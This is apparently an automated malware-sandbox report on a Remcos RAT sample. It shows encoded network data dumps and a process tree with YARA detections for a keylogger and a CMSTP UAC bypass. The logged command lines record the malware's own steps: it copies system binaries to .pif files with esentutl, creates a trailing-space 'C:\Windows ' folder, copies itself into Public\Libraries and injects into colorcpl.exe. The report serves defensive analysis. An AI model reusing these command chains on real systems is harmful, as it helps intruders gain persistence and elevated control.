                                                                    2024-11-26 07:12:20 UTC4918INData Raw: 6d 36 4f 61 54 68 69 63 70 6b 41 45 41 78 55 4a 47 51 59 46 42 77 77 63 42 51 6f 5a 47 77 4d 4b 44 68 55 4d 47 78 63 4b 43 68 4d 63 44 42 73 5a 44 78 73 4e 44 77 63 47 43 42 59 49 47 68 41 51 46 41 73 4b 41 77 4d 61 46 51 51 4a 43 51 59 58 48 41 6b 62 43 52 73 63 42 51 6b 57 47 42 51 47 46 42 67 50 43 68 6f 51 46 67 34 53 45 67 55 51 45 77 51 47 41 78 6b 58 48 41 34 49 47 41 55 53 42 42 41 63 42 42 59 51 47 52 51 45 43 52 55 61 47 67 38 45 47 68 59 50 43 41 51 56 47 77 38 53 47 42 6b 62 46 67 6f 46 45 52 67 55 46 52 6d 62 6f 35 70 4f 47 4a 79 6d 51 50 6b 58 45 78 59 4a 43 52 67 52 47 77 67 57 6d 36 4f 61 54 68 69 63 70 6b 43 5a 6e 4b 71 65 72 70 2b 61 6f 4a 47 68 6f 6f 42 70 41 46 2b 2f 36 4e 70 52 4d 58 7a 56 72 44 45 33 54 62 44 72 79 43 62 32 4c 62 61
                                                                    Data Ascii: m6OaThicpkAEAxUJGQYFBwwcBQoZGwMKDhUMGxcKChMcDBsZDxsNDwcGCBYIGhAQFAsKAwMaFQQJCQYXHAkbCRscBQkWGBQGFBgPChoQFg4SEgUQEwQGAxkXHA4IGAUSBBAcBBYQGRQECRUaGg8EGhYPCAQVGw8SGBkbFgoFERgUFRmbo5pOGJymQPkXExYJCRgRGwgWm6OaThicpkCZnKqerp+aoJGhooBpAF+/6NpRMXzVrDE3TbDryCb2Lba
                                                                    2024-11-26 07:12:20 UTC4862INData Raw: 62 69 4a 39 67 2f 35 44 48 6f 4d 73 51 6e 76 7a 5a 4c 50 66 67 6e 4f 7a 45 6d 49 7a 45 32 78 43 69 7a 4d 37 34 38 70 79 32 61 4b 5a 55 30 6d 6a 46 78 4a 34 6f 68 64 69 4b 4b 49 31 6b 38 57 69 35 57 50 32 77 75 45 44 55 43 50 77 6b 75 46 44 66 36 4c 50 55 78 33 54 2f 54 4b 2b 55 69 38 44 4b 34 50 72 67 6f 51 53 2f 31 4a 79 49 2b 4f 43 51 30 49 62 38 7a 75 53 47 30 49 61 77 38 6d 76 47 58 4d 5a 6b 6a 67 54 46 34 4c 33 73 70 66 79 74 6a 4e 31 6f 70 56 43 56 76 4a 68 63 79 45 69 73 57 4d 52 73 33 51 43 6e 79 4a 65 49 70 36 7a 58 6f 38 64 38 2f 7a 69 72 41 50 30 4d 71 2b 79 55 30 50 69 49 33 49 54 41 6d 4d 38 38 6b 77 6a 47 6c 4e 4b 6f 69 71 44 4f 71 4e 33 4d 6a 66 43 70 39 49 34 63 33 63 43 46 58 4c 46 59 71 57 44 55 51 4b 46 41 36 48 6a 6b 4c 4c 51 45 72 51
                                                                    Data Ascii: biJ9g/5DHoMsQnvzZLPfgnOzEmIzE2xCizM748py2aKZU0mjFxJ4ohdiKKI1k8Wi5WP2wuEDUCPwkuFDf6LPUx3T/TK+Ui8DK4PrgoQS/1JyI+OCQ0Ib8zuSG0Iaw8mvGXMZkjgTF4L3spfytjN1opVCVvJhcyEisWMRs3QCnyJeIp6zXo8d8/zirAP0Mq+yU0PiI3ITAmM88kwjGlNKoiqDOqN3MjfCp9I4c3cCFXLFYqWDUQKFA6HjkLLQErQ
                                                                    2024-11-26 07:12:20 UTC1322INData Raw: 53 79 6a 58 4f 72 38 75 2f 43 32 71 4d 48 4b 6b 6e 71 54 73 6d 70 75 76 72 61 6d 66 4e 6e 6b 70 42 6a 7a 66 4d 4f 38 30 52 43 66 31 4e 46 51 68 6d 6a 47 44 50 49 6e 78 67 43 56 76 4a 45 45 38 30 6a 4c 56 4d 64 51 6b 38 44 53 48 50 34 30 6c 59 44 4d 56 49 64 34 30 52 53 72 41 4e 70 30 35 6a 79 69 51 4c 33 34 7a 6e 44 59 59 49 70 49 6b 45 53 69 4f 4b 56 63 32 62 53 51 53 4e 52 59 6b 77 44 2f 36 4e 54 73 6b 4d 44 78 65 4a 38 6f 35 43 54 63 62 49 30 55 71 31 7a 72 6b 4e 75 66 78 4b 43 65 66 4c 71 51 33 68 69 30 4b 4b 4f 73 36 78 43 67 73 4b 4b 77 79 66 79 38 45 50 67 4d 73 44 54 35 4c 38 64 41 6d 77 43 57 44 4f 57 34 6e 4b 43 76 51 4b 33 63 2f 46 43 62 6a 50 4f 38 36 73 69 52 41 4b 4c 34 6c 6d 44 6d 71 4c 48 55 7a 63 79 5a 57 4d 78 59 6d 30 35 6d 71 70 47 69
                                                                    Data Ascii: SyjXOr8u/C2qMHKknqTsmpuvramfNnkpBjzfMO80RCf1NFQhmjGDPInxgCVvJEE80jLVMdQk8DSHP40lYDMVId40RSrANp05jyiQL34znDYYIpIkESiOKVc2bSQSNRYkwD/6NTskMDxeJ8o5CTcbI0Uq1zrkNufxKCefLqQ3hi0KKOs6xCgsKKwyfy8EPgMsDT5L8dAmwCWDOW4nKCvQK3c/FCbjPO86siRAKL4lmDmqLHUzcyZWMxYm05mqpGi
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 45 63 50 39 59 38 76 7a 78 4c 4a 76 6f 78 4d 7a 63 70 4e 7a 38 6f 4e 44 33 4e 4d 5a 73 32 6d 43 57 6d 4e 34 67 69 59 54 45 58 50 42 7a 78 34 69 58 74 4a 4e 67 38 75 44 4b 33 4d 54 55 6b 4d 7a 55 6e 50 36 45 6c 66 44 4f 47 49 56 67 30 59 69 6f 65 4d 51 45 2b 51 43 2f 30 4b 45 67 31 4d 6a 43 55 49 59 38 6e 6a 69 53 46 4a 59 45 36 62 69 67 45 4f 55 6b 6f 32 54 50 63 4f 64 49 6f 73 54 46 41 4b 73 51 33 79 7a 6e 49 4c 5a 4d 6c 65 44 57 47 4f 58 41 76 58 53 68 6b 38 52 45 35 38 79 50 61 4a 76 67 30 52 53 59 39 4a 6a 59 37 77 69 61 68 4e 4a 34 6d 68 7a 52 39 4b 6e 30 73 62 53 34 58 4d 6b 49 73 41 66 46 50 49 2b 73 33 7a 43 34 70 4e 4a 45 79 6d 79 32 67 49 5a 30 74 66 44 46 56 4a 42 6b 37 47 79 34 4f 4f 77 63 75 30 79 48 75 4f 72 30 7a 79 54 52 4d 4e 2f 4c 78 4d
                                                                    Data Ascii: EcP9Y8vzxLJvoxMzcpNz8oND3NMZs2mCWmN4giYTEXPBzx4iXtJNg8uDK3MTUkMzUnP6ElfDOGIVg0YioeMQE+QC/0KEg1MjCUIY8njiSFJYE6bigEOUko2TPcOdIosTFAKsQ3yznILZMleDWGOXAvXShk8RE58yPaJvg0RSY9JjY7wiahNJ4mhzR9Kn0sbS4XMkIsAfFPI+s3zC4pNJEymy2gIZ0tfDFVJBk7Gy4OOwcu0yHuOr0zyTRMN/LxM
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 53 79 35 53 4e 51 6f 36 36 43 52 4e 49 67 51 2f 50 7a 6f 39 4c 35 73 70 62 79 77 2f 4c 48 63 7a 58 79 45 67 4d 42 4d 68 45 7a 6f 30 4d 39 59 6a 47 71 79 68 6b 55 4b 75 6c 4b 53 53 4b 58 72 78 67 44 42 66 50 56 4d 72 55 43 78 42 4a 4e 63 39 38 43 65 57 49 63 4d 79 6a 53 55 46 4a 66 63 79 6b 53 37 65 50 44 6b 75 6f 7a 31 35 49 7a 51 6c 74 4a 65 72 71 79 69 56 72 36 6d 66 6e 4b 34 78 59 79 67 47 4e 4f 51 79 6e 79 31 56 49 56 38 74 45 7a 45 43 4a 42 38 37 46 43 34 57 4f 77 67 75 47 69 45 4c 4f 6b 73 7a 39 6a 54 64 4f 6d 49 72 73 36 32 70 71 6a 79 5a 6e 34 71 65 72 70 38 75 51 79 66 36 4c 6b 59 36 39 53 7a 65 49 65 4d 6e 35 54 6a 53 4a 70 41 30 38 44 66 58 49 39 55 6c 35 53 75 79 4b 4d 59 6f 78 76 47 34 50 56 67 6e 2b 43 35 4c 50 50 38 6f 2f 69 73 79 4e 53 51
                                                                    Data Ascii: Sy5SNQo66CRNIgQ/Pzo9L5spbyw/LHczXyEgMBMhEzo0M9YjGqyhkUKulKSSKXrxgDBfPVMrUCxBJNc98CeWIcMyjSUFJfcykS7ePDkuoz15IzQltJerqyiVr6mfnK4xYygGNOQyny1VIV8tEzECJB87FC4WOwguGiELOksz9jTdOmIrs62pqjyZn4qerp8uQyf6LkY69SzeIeMn5TjSJpA08DfXI9Ul5SuyKMYoxvG4PVgn+C5LPP8o/isyNSQ
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 55 38 48 53 59 54 49 78 6f 78 42 53 4d 41 49 2f 59 2b 53 43 50 6b 4d 76 44 78 36 6a 4c 74 4c 4e 63 71 77 53 6a 44 4e 4c 77 71 52 69 62 37 4a 55 77 78 4f 79 67 6f 4d 6a 63 30 4d 43 6f 69 4a 72 45 71 74 6a 62 4c 49 36 59 38 72 43 6d 63 50 5a 55 6f 71 69 65 48 50 45 38 32 55 44 47 31 4d 34 49 6b 55 6a 46 59 4e 46 55 6c 61 54 51 50 4d 45 73 6b 33 79 33 63 4a 4f 49 77 53 53 59 74 4b 7a 6f 74 4a 6a 57 55 4b 76 59 34 52 6a 76 68 4c 39 63 6f 66 69 61 42 4a 54 59 6c 4d 43 4b 50 50 6f 4d 6b 53 43 33 6f 50 2b 67 72 36 79 69 6f 4e 33 34 30 73 6a 51 76 4c 6a 55 35 75 54 79 67 50 49 6f 6a 58 6a 5a 55 4f 6d 73 2b 47 53 32 5a 50 6e 67 72 68 44 68 6a 4e 57 77 70 48 43 7a 50 4c 66 49 31 78 54 75 67 50 35 6b 71 69 7a 74 6d 4d 47 6b 71 47 44 7a 62 4c 75 59 37 31 79 56 42 50
                                                                    Data Ascii: U8HSYTIxoxBSMAI/Y+SCPkMvDx6jLtLNcqwSjDNLwqRib7JUwxOygoMjc0MCoiJrEqtjbLI6Y8rCmcPZUoqieHPE82UDG1M4IkUjFYNFUlaTQPMEsk3y3cJOIwSSYtKzotJjWUKvY4RjvhL9cofiaBJTYlMCKPPoMkSC3oP+gr6yioN340sjQvLjU5uTygPIojXjZUOms+GS2ZPngrhDhjNWwpHCzPLfI1xTugP5kqiztmMGkqGDzbLuY71yVBP
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 4e 31 55 69 44 53 70 37 4d 57 73 34 48 44 38 48 50 4e 38 72 35 44 37 4f 4f 30 34 71 78 6a 76 4e 50 71 55 71 65 79 4e 6f 4b 6d 55 2b 47 43 68 4f 4a 63 51 6a 54 54 77 74 49 53 30 7a 6e 7a 43 71 4a 34 34 68 66 79 39 57 4c 46 51 73 48 79 51 61 4f 45 55 69 31 53 76 6b 4f 65 45 74 2b 53 34 31 4d 43 30 7a 4e 6a 4f 38 4b 5a 49 2f 6d 54 6c 79 4f 57 49 6d 55 6a 4e 69 50 77 77 37 39 79 68 46 4f 74 30 76 34 54 77 78 4d 53 49 74 73 79 69 75 6d 5a 57 68 71 61 2b 58 37 36 6d 5a 6e 6a 65 62 50 48 51 6d 64 6a 42 58 49 6e 41 33 48 43 6b 63 4d 76 38 39 36 43 7a 6c 4b 39 30 33 41 7a 4a 50 4a 2b 41 68 51 69 50 6b 49 75 55 39 36 69 2f 43 50 72 51 76 73 7a 51 41 50 6b 55 76 39 6a 5a 43 4c 54 30 32 57 71 53 53 6d 41 43 66 6e 39 36 64 6f 35 55 6a 4d 43 54 47 4b 2b 47 6a 71 70 6e
                                                                    Data Ascii: N1UiDSp7MWs4HD8HPN8r5D7OO04qxjvNPqUqeyNoKmU+GChOJcQjTTwtIS0znzCqJ44hfy9WLFQsHyQaOEUi1SvkOeEt+S41MC0zNjO8KZI/mTlyOWImUjNiPww79yhFOt0v4TwxMSItsyiumZWhqa+X76mZnjebPHQmdjBXInA3HCkcMv896CzlK903AzJPJ+AhQiPkIuU96i/CPrQvszQAPkUv9jZCLT02WqSSmACfn96do5UjMCTGK+Gjqpn
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 75 6e 4e 33 63 74 56 69 52 71 4e 6c 6b 69 43 43 45 48 50 30 49 38 53 6a 7a 65 4a 72 49 78 77 44 65 61 4e 4a 67 72 6f 6a 36 4d 4d 6f 38 32 66 43 56 77 4e 39 59 69 32 6a 45 79 50 44 6a 78 73 69 53 48 4a 58 49 39 6a 54 4e 65 4d 46 34 6c 53 6a 54 75 50 2b 6f 6c 30 6a 50 38 49 63 51 30 74 43 71 71 4e 6f 4d 35 6a 53 69 4e 4c 32 73 79 57 54 64 4c 49 65 4d 6e 32 43 53 33 4a 66 73 36 78 69 69 35 4f 5a 51 70 72 44 4a 33 4f 46 6b 70 54 54 41 74 4b 46 34 31 5a 6a 74 4d 4c 39 49 6d 34 6a 62 4e 4f 35 41 74 48 53 70 45 49 76 59 37 53 43 36 69 4b 36 34 35 55 69 73 42 4b 30 34 33 69 53 70 41 4f 48 6f 71 36 54 67 30 4a 35 41 68 62 43 50 7a 50 79 63 6d 38 69 6f 31 4b 4b 41 38 59 53 56 71 50 78 59 35 49 43 63 2b 4b 48 4d 6b 64 54 68 57 4c 51 4d 79 7a 79 66 32 4d 6b 77 6e 4c
                                                                    Data Ascii: unN3ctViRqNlkiCCEHP0I8SjzeJrIxwDeaNJgroj6MMo82fCVwN9Yi2jEyPDjxsiSHJXI9jTNeMF4lSjTuP+ol0jP8IcQ0tCqqNoM5jSiNL2syWTdLIeMn2CS3Jfs6xii5OZQprDJ3OFkpTTAtKF41ZjtML9Im4jbNO5AtHSpEIvY7SC6iK645UisBK043iSpAOHoq6Tg0J5AhbCPzPycm8io1KKA8YSVqPxY5ICc+KHMkdThWLQMyzyf2MkwnL
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 74 54 72 45 4d 6e 45 6f 66 54 34 63 4c 42 6f 35 33 69 66 55 50 4f 41 7a 52 53 49 37 4a 48 51 35 45 6a 78 49 6e 4b 71 65 67 70 2b 62 37 5a 47 68 6d 69 78 34 50 51 30 74 58 7a 58 76 50 38 45 75 4d 6a 62 61 4b 6d 63 33 61 54 6c 6d 4c 64 4d 6b 38 7a 54 4a 4f 59 38 76 55 79 68 68 38 51 34 35 44 53 4e 49 4a 74 38 30 32 53 62 52 4a 73 59 37 39 53 59 77 4f 6c 30 71 4d 7a 67 78 4a 72 6a 78 71 43 4e 2b 50 77 49 68 2f 53 33 6d 4c 74 34 36 53 69 4d 73 4f 54 30 2f 78 79 61 64 4b 6f 59 6d 66 54 6f 4d 4c 77 63 77 37 69 58 77 4d 4d 63 6c 41 43 6f 36 4d 49 49 35 44 7a 37 37 50 65 41 71 49 54 38 76 4f 72 38 72 6b 7a 6c 7a 50 59 51 70 56 66 48 6c 4b 66 38 39 53 79 76 35 4a 69 66 78 4b 7a 38 79 49 72 63 77 6d 6a 4b 4a 4a 6c 33 78 54 43 35 4e 6e 61 2b 64 45 4a 57 59 7a 4a 53
                                                                    Data Ascii: tTrEMnEofT4cLBo53ifUPOAzRSI7JHQ5EjxInKqegp+b7ZGhmix4PQ0tXzXvP8EuMjbaKmc3aTlmLdMk8zTJOY8vUyhh8Q45DSNIJt802SbRJsY79SYwOl0qMzgxJrjxqCN+PwIh/S3mLt46SiMsOT0/xyadKoYmfToMLwcw7iXwMMclACo6MII5Dz77PeAqIT8vOr8rkzlzPYQpVfHlKf89Syv5JifxKz8yIrcwmjKJJl3xTC5Nna+dEJWYzJS
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 30 73 41 7a 77 65 4d 45 6b 6d 38 43 48 6d 4b 54 4d 77 70 79 71 57 4c 6e 49 38 66 69 35 71 4c 6d 63 7a 62 79 34 55 50 78 30 74 41 7a 39 4c 49 66 49 6e 36 79 58 61 4f 54 63 6e 72 79 69 6c 4b 34 6f 2f 5a 69 5a 75 50 42 73 36 53 79 54 5a 4b 44 41 6b 38 54 6a 4e 4c 49 38 7a 68 43 62 65 4d 7a 55 6d 4e 69 6b 70 4d 73 63 37 70 71 36 6b 72 77 79 61 6c 70 32 70 4e 35 6b 6d 55 54 64 61 4d 77 34 6e 47 43 37 77 4a 39 77 7a 79 69 53 6c 4b 59 49 76 62 6a 42 54 4c 56 34 2f 42 54 77 4f 4b 4d 38 75 74 66 48 32 49 38 44 78 62 43 68 75 4e 41 6b 75 54 69 64 44 4e 54 34 68 6b 79 4f 4e 50 51 30 2b 46 54 37 65 4a 4f 34 7a 51 6a 55 79 4e 53 55 71 77 6a 2b 61 4e 4c 41 77 66 43 4e 66 4d 51 67 6b 46 7a 63 47 4f 68 63 6d 38 79 50 74 49 72 67 36 39 44 54 32 4e 37 59 6a 6e 54 4b 58 4f
                                                                    Data Ascii: 0sAzweMEkm8CHmKTMwpyqWLnI8fi5qLmczby4UPx0tAz9LIfIn6yXaOTcnryilK4o/ZiZuPBs6SyTZKDAk8TjNLI8zhCbeMzUmNikpMsc7pq6krwyalp2pN5kmUTdaMw4nGC7wJ9wzyiSlKYIvbjBTLV4/BTwOKM8utfH2I8DxbChuNAkuTidDNT4hkyONPQ0+FT7eJO4zQjUyNSUqwj+aNLAwfCNfMQgkFzcGOhcm8yPtIrg69DT2N7YjnTKXO


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:02:12:11
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\nft438A5fN.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:02:12:22
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
                                                                    Imagebase:0xa40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:02:12:22
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6ee680000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:02:12:23
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
                                                                    Imagebase:0xb80000
                                                                    File size:352'768 bytes
                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6ee680000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:02:12:24
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\colorcpl.exe
                                                                    Imagebase:0xe60000
                                                                    File size:86'528 bytes
                                                                    MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:02:12:25
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:15
                                                                    Start time:02:12:26
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:02:12:26
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\xpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                    Imagebase:0xf0000
                                                                    File size:18'944 bytes
                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:02:12:34
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\Libraries\Wuqtggvo.PIF
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Libraries\Wuqtggvo.PIF"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:Borland Delphi
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 58%, ReversingLabs
                                                                    • Detection: 68%, Virustotal, Browse
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:02:12:35
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\colorcpl.exe
                                                                    Imagebase:0xe60000
                                                                    File size:86'528 bytes
                                                                    MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
